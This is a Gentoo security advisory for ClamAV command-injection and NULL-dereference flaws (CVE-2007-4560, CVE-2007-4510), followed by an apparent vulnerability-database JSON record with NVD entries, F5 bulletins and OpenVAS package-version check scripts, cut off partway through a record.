ID GLSA-200709-14 Type gentoo Reporter Gentoo Foundation Modified 2007-09-20T00:00:00
Description
Background
Clam AntiVirus is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways.
Description
Nikolaos Rangos discovered a vulnerability in ClamAV which exists because the recipient address extracted from email messages is not properly sanitized before being used in a call to "popen()" when executing sendmail (CVE-2007-4560). Also, NULL-pointer dereference errors exist within the "cli_scanrtf()" function in libclamav/rtf.c and Stefanos Stamatis discovered a NULL-pointer dereference vulnerability within the "cli_html_normalise()" function in libclamav/htmlnorm.c (CVE-2007-4510).
Impact
The unsanitized recipient address can be exploited to execute arbitrary code with the privileges of the clamav-milter process by sending an email with a specially crafted recipient address to the affected system. Also, the NULL-pointer dereference errors can be exploited to crash ClamAV. Successful exploitation of the latter vulnerability requires that clamav-milter is started with the "black hole" mode activated, which is not enabled by default.
Workaround
There is no known workaround at this time.
Resolution
All ClamAV users should upgrade to the latest version:
{"id": "GLSA-200709-14", "lastseen": "2016-09-06T19:46:29", "viewCount": 4, "bulletinFamily": "unix", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 1, "enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2016-09-06T19:46:29", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4510", "CVE-2007-4560"]}, {"type": "f5", "idList": ["SOL7985", "SOL7983"]}, {"type": "nessus", "idList": ["CLAMAV_MILTER_BLACKHOLE_CMD_EXEC.NASL", "MACOSX_SECUPD2008-002.NASL", "DEBIAN_DSA-1366.NASL", "FREEBSD_PKG_B6F6DA57680A11DCB350001921AB2FA4.NASL", "FEDORA_2007-2050.NASL", "GENTOO_GLSA-200709-14.NASL", "MANDRAKE_MDKSA-2007-172.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:861537", "OPENVAS:860037", "OPENVAS:860691", "OPENVAS:860614", "OPENVAS:58583", "OPENVAS:1361412562310830082", "OPENVAS:830082", "OPENVAS:58795", "OPENVAS:58622"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1366-1:CBD8B"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/SMTP/CLAMAV_MILTER_BLACKHOLE"]}, {"type": "d2", "idList": ["D2SEC_CLAMAV"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82333"]}, {"type": "saint", "idList": ["SAINT:AFAA5C81CD911B6C862E6FC1DA37BB84", "SAINT:04B532BA379845DF79BE2BAE7217EF75", "SAINT:61A42486FDC3E09655A7B9A3336F7AC7"]}, {"type": "osvdb", "idList": ["OSVDB:36909", "OSVDB:36910", "OSVDB:36911"]}, {"type": "freebsd", "idList": ["B6F6DA57-680A-11DC-B350-001921AB2FA4"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8176"]}, {"type": "exploitdb", "idList": ["EDB-ID:16924", "EDB-ID:9913"]}], "modified": "2016-09-06T19:46:29", "rev": 2}, "vulnersScore": 8.1}, "type": "gentoo", "affectedPackage": [{"arch": "all", "packageFilename": "UNKNOWN", "OSVersion": "any", "operator": "lt", "packageName": "app-antivirus/clamav", "packageVersion": "0.91.2", "OS": "Gentoo"}], "description": "### Background\n\nClam AntiVirus is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. \n\n### Description\n\nNikolaos Rangos discovered a vulnerability in ClamAV which exists because the recipient address extracted from email messages is not properly sanitized before being used in a call to \"popen()\" when executing sendmail (CVE-2007-4560). Also, NULL-pointer dereference errors exist within the \"cli_scanrtf()\" function in libclamav/rtf.c and Stefanos Stamatis discovered a NULL-pointer dereference vulnerability within the \"cli_html_normalise()\" function in libclamav/htmlnorm.c (CVE-2007-4510). \n\n### Impact\n\nThe unsanitized recipient address can be exploited to execute arbitrary code with the privileges of the clamav-milter process by sending an email with a specially crafted recipient address to the affected system. Also, the NULL-pointer dereference errors can be exploited to crash ClamAV. Successful exploitation of the latter vulnerability requires that clamav-milter is started with the \"black hole\" mode activated, which is not enabled by default. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll ClamAV users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-antivirus/clamav-0.91.2\"", "title": "ClamAV: Multiple vulnerabilities", "cvelist": ["CVE-2007-4510", "CVE-2007-4560"], "published": "2007-09-20T00:00:00", "references": ["https://bugs.gentoo.org/show_bug.cgi?id=189912", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4510", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4560"], "reporter": "Gentoo Foundation", "modified": "2007-09-20T00:00:00", "href": "https://security.gentoo.org/glsa/200709-14"}
{"cve": [{"lastseen": "2020-12-09T19:26:07", "description": "clamav-milter in ClamAV before 0.91.2, when run in black hole mode, allows remote attackers to execute arbitrary commands via shell metacharacters that are used in a certain popen call, involving the \"recipient field of sendmail.\"", "edition": 5, "cvss3": {}, "published": "2007-08-28T01:17:00", "title": "CVE-2007-4560", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4560"], "modified": "2018-10-15T21:36:00", "cpe": ["cpe:/a:clam_anti-virus:clamav:0.91.1"], "id": "CVE-2007-4560", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4560", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:clam_anti-virus:clamav:0.91.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:26:07", "description": "ClamAV before 0.91.2, as used in Kolab Server 2.0 through 2.2beta1 and other products, allows remote attackers to cause a denial of service (application crash) via (1) a crafted RTF file, which triggers a NULL dereference in the cli_scanrtf function in libclamav/rtf.c; or (2) a crafted HTML document with a data: URI, which triggers a NULL dereference in the cli_html_normalise function in libclamav/htmlnorm.c. NOTE: some of these details are obtained from third party information.", "edition": 5, "cvss3": {}, "published": "2007-08-23T19:17:00", "title": "CVE-2007-4510", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4510"], "modified": "2017-07-29T01:32:00", "cpe": ["cpe:/a:clam_anti-virus:clamav:0.91.2", "cpe:/a:kolab:kolab_server:2.0", "cpe:/a:kolab:kolab_server:2.0.4", "cpe:/a:kolab:kolab_server:2.2beta1", "cpe:/a:kolab:kolab_server:2.0.2", "cpe:/a:kolab:kolab_server:2.0.3", "cpe:/a:kolab:kolab_server:2.0.1", "cpe:/a:kolab:kolab_server:2.1"], "id": "CVE-2007-4510", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4510", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:kolab:kolab_server:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:kolab:kolab_server:2.2beta1:*:*:*:*:*:*:*", "cpe:2.3:a:kolab:kolab_server:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:kolab:kolab_server:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:kolab:kolab_server:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:clam_anti-virus:clamav:0.91.2:*:*:*:*:*:*:*", "cpe:2.3:a:kolab:kolab_server:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:kolab:kolab_server:2.0.1:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2016-09-26T17:23:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-4510"], "edition": 1, "description": "The FirePass controller can be configured to provide anti-virus scanning of files uploaded through Portal Access through the ClamAV open source software. Scanning is configured on the Antivirus tab of the Portal Access > Content Inspection page, through the **Enable Standalone virus Scanner** option button.\n\nA vulnerability in ClamAV versions prior to version 0.91.2 could allow a remote attacker to crash the scanner process remotely using either a specially crafted file in Rich Text Format (RTF) or a specially crafted HTML file containing a **data:** URI.\n\nBy crashing the scanner process (**clamd** daemon), a Denial of Service condition could be created which could prevent the FirePass controller from scanning other files, or prevent subsequent file transfers through Portal Access.\n\nF5 will address this issue by providing a hotfix which updates your FirePass controller to version 0.91.2 of ClamAV.\n\nInformation about this issue is available at the following location:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4510>\n\nF5 Product Development tracked this issue as CR86313 for FirePass, and it was fixed in FirePass 6.0.2. For information about upgrading, refer to the FirePass release notes.\n\nAdditionally, hotfix HF-86313-1 (ClamAV version 0.91.2 hotfix) has been issued for all currently supported versions of FirePass software. You may download this hotfix or a later version of the ClamAV hotfix from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nFor instructions about how to obtain a hotfix, refer to SOL167: Downloading software from F5.\n", "modified": "2013-03-19T00:00:00", "published": "2007-09-27T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/7000/900/sol7983.html", "id": "SOL7983", "title": "SOL7983 - ClamAV NULL dereference vulnerability - CVE-2007-4510", "type": "f5", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:02", "bulletinFamily": "software", "cvelist": ["CVE-2007-4560", "CVE-2007-4160"], "edition": 1, "description": "The FirePass controller can be configured to provide anti-virus scanning of files uploaded through Portal Access through the ClamAV open source software. Scanning is configured on the Antivirus tab of the Portal Access: Content Inspection page, through the **Enable Standalone virus Scanner** option button.\n\nA vulnerability in ClamAV versions prior to version 0.91.2 could allow a remote attacker to crash the scanner process remotely or execute arbitrary commands remotely using a specially crafted SMTP header of an email message. The vulnerability affects the **clamav-milter** program, when used in conjunction with the Sendmail mail transfer agent package.\n\nThe FirePass controller does not use the **clamav-milter** program for Sendmail. Therefore, the FirePass controller is not vulnerable to the issue described in CVE-2007-4160.\n\nInformation about this issue is available at the following location:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4560>\n", "modified": "2013-03-19T00:00:00", "published": "2007-09-27T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/7000/900/sol7985.html", "id": "SOL7985", "title": "SOL7985 - ClamAV clamav-milter vulnerability - CVE-2007-4560", "type": "f5", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4510", "CVE-2007-4560"], "description": "The remote host is missing an update to clamav\nannounced via advisory DSA 1366-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:58583", "href": "http://plugins.openvas.org/nasl.php?oid=58583", "type": "openvas", "title": "Debian Security Advisory DSA 1366-1 (clamav)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1366_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1366-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in the Clam anti-virus\ntoolkit. The Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2007-4510\n\nIt was discovered that the RTF and RFC2397 parsers can be tricked\ninto dereferencing a NULL pointer, resulting in denial of service.\n\nCVE-2007-4560\n\nIt was discovered clamav-milter performs insufficicient input\nsanitising, resulting in the execution of arbitrary shell commands.\n\nThe oldstable distribution (sarge) is only affected by a subset of\nthe problems. An update will be provided later.\n\nFor the stable distribution (etch) these problems have been fixed\nin version 0.90.1-3etch7.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 0.91.2-1.\n\nWe recommend that you upgrade your clamav packages.\";\ntag_summary = \"The remote host is missing an update to clamav\nannounced via advisory DSA 1366-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201366-1\";\n\nif(description)\n{\n script_id(58583);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:19:52 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-4510\", \"CVE-2007-4560\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1366-1 (clamav)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"clamav-base\", ver:\"0.90.1-3etch7\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"clamav-docs\", ver:\"0.90.1-3etch7\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"clamav-testfiles\", ver:\"0.90.1-3etch7\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"clamav\", ver:\"0.90.1-3etch7\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"clamav-daemon\", ver:\"0.90.1-3etch7\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"clamav-dbg\", ver:\"0.90.1-3etch7\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"clamav-freshclam\", ver:\"0.90.1-3etch7\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"clamav-milter\", ver:\"0.90.1-3etch7\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libclamav-dev\", ver:\"0.90.1-3etch7\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libclamav2\", ver:\"0.90.1-3etch7\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4510", "CVE-2007-4560"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200709-14.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:58622", "href": "http://plugins.openvas.org/nasl.php?oid=58622", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200709-14 (clamav)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Vulnerabilities have been discovered in ClamAV allowing remote execution of\narbitrary code and Denial of Service attacks.\";\ntag_solution = \"All ClamAV users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-antivirus/clamav-0.91.2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200709-14\nhttp://bugs.gentoo.org/show_bug.cgi?id=189912\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200709-14.\";\n\n \n\nif(description)\n{\n script_id(58622);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2007-4510\", \"CVE-2007-4560\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200709-14 (clamav)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-antivirus/clamav\", unaffected: make_list(\"ge 0.91.2\"), vulnerable: make_list(\"lt 0.91.2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:38:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4510", "CVE-2007-4560"], "description": "Check for the Version of clamav", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:1361412562310830082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830082", "type": "openvas", "title": "Mandriva Update for clamav MDKSA-2007:172 (clamav)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for clamav MDKSA-2007:172 (clamav)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability in ClamAV was discovered that could allow remote\n attackers to cause a denial of service via a crafted RTF file or a\n crafted HTML document with a data: URI, both of which trigger a NULL\n dereference (CVE-2007-4510).\n\n A vulnerability in clamav-milter, when run in black hole mode,\n could allow remote attackers to execute arbitrary commands via shell\n metacharacters that are used in a certain popen call (CVE-2007-4560).\n \n Other bugs have also been corrected in 0.91.2 which is being provided\n with this update.\";\n\ntag_affected = \"clamav on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64,\n Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-09/msg00000.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830082\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:57:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDKSA\", value: \"2007:172\");\n script_cve_id(\"CVE-2007-4510\", \"CVE-2007-4560\");\n script_name( \"Mandriva Update for clamav MDKSA-2007:172 (clamav)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of clamav\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-db\", rpm:\"clamav-db~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-milter\", rpm:\"clamav-milter~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamd\", rpm:\"clamd~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamdmon\", rpm:\"clamdmon~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libclamav-devel\", rpm:\"libclamav-devel~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libclamav2\", rpm:\"libclamav2~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64clamav-devel\", rpm:\"lib64clamav-devel~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64clamav2\", rpm:\"lib64clamav2~0.91.2~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"clamav\", rpm:\"clamav~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-db\", rpm:\"clamav-db~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamav-milter\", rpm:\"clamav-milter~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamd\", rpm:\"clamd~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"clamdmon\", rpm:\"clamdmon~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libclamav-devel\", rpm:\"libclamav-devel~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libclamav2\", rpm:\"libclamav2~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64clamav-devel\", rpm:\"lib64clamav-devel~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64clamav2\", rpm:\"lib64clamav2~0.91.2~1.1mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4510", "CVE-2007-4560"], "description": "Check for the Version of clamav", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:830082", "href": "http://plugins.openvas.org/nasl.php?oid=830082", "type": "openvas", "title": "Mandriva Update for clamav MDKSA-2007:172 (clamav)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for clamav MDKSA-2007:172 (clamav)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability in ClamAV was discovered that could allow remote\n attackers to cause a denial of service via a crafted RTF file or a\n crafted HTML document with a data: URI, both of which trigger a NULL\n dereference (CVE-2007-4510).\n\n A vulnerability in clamav-milter, when run in black hole mode,\n could allow remote attackers to execute arbitrary commands via shell\n metacharacters that are used in a certain popen call (CVE-2007-4560).\n \n Other bugs have also been corrected in 0.91.2 which is being provided\n with this update.\";\n\ntag_affected = \"clamav on Mandriva 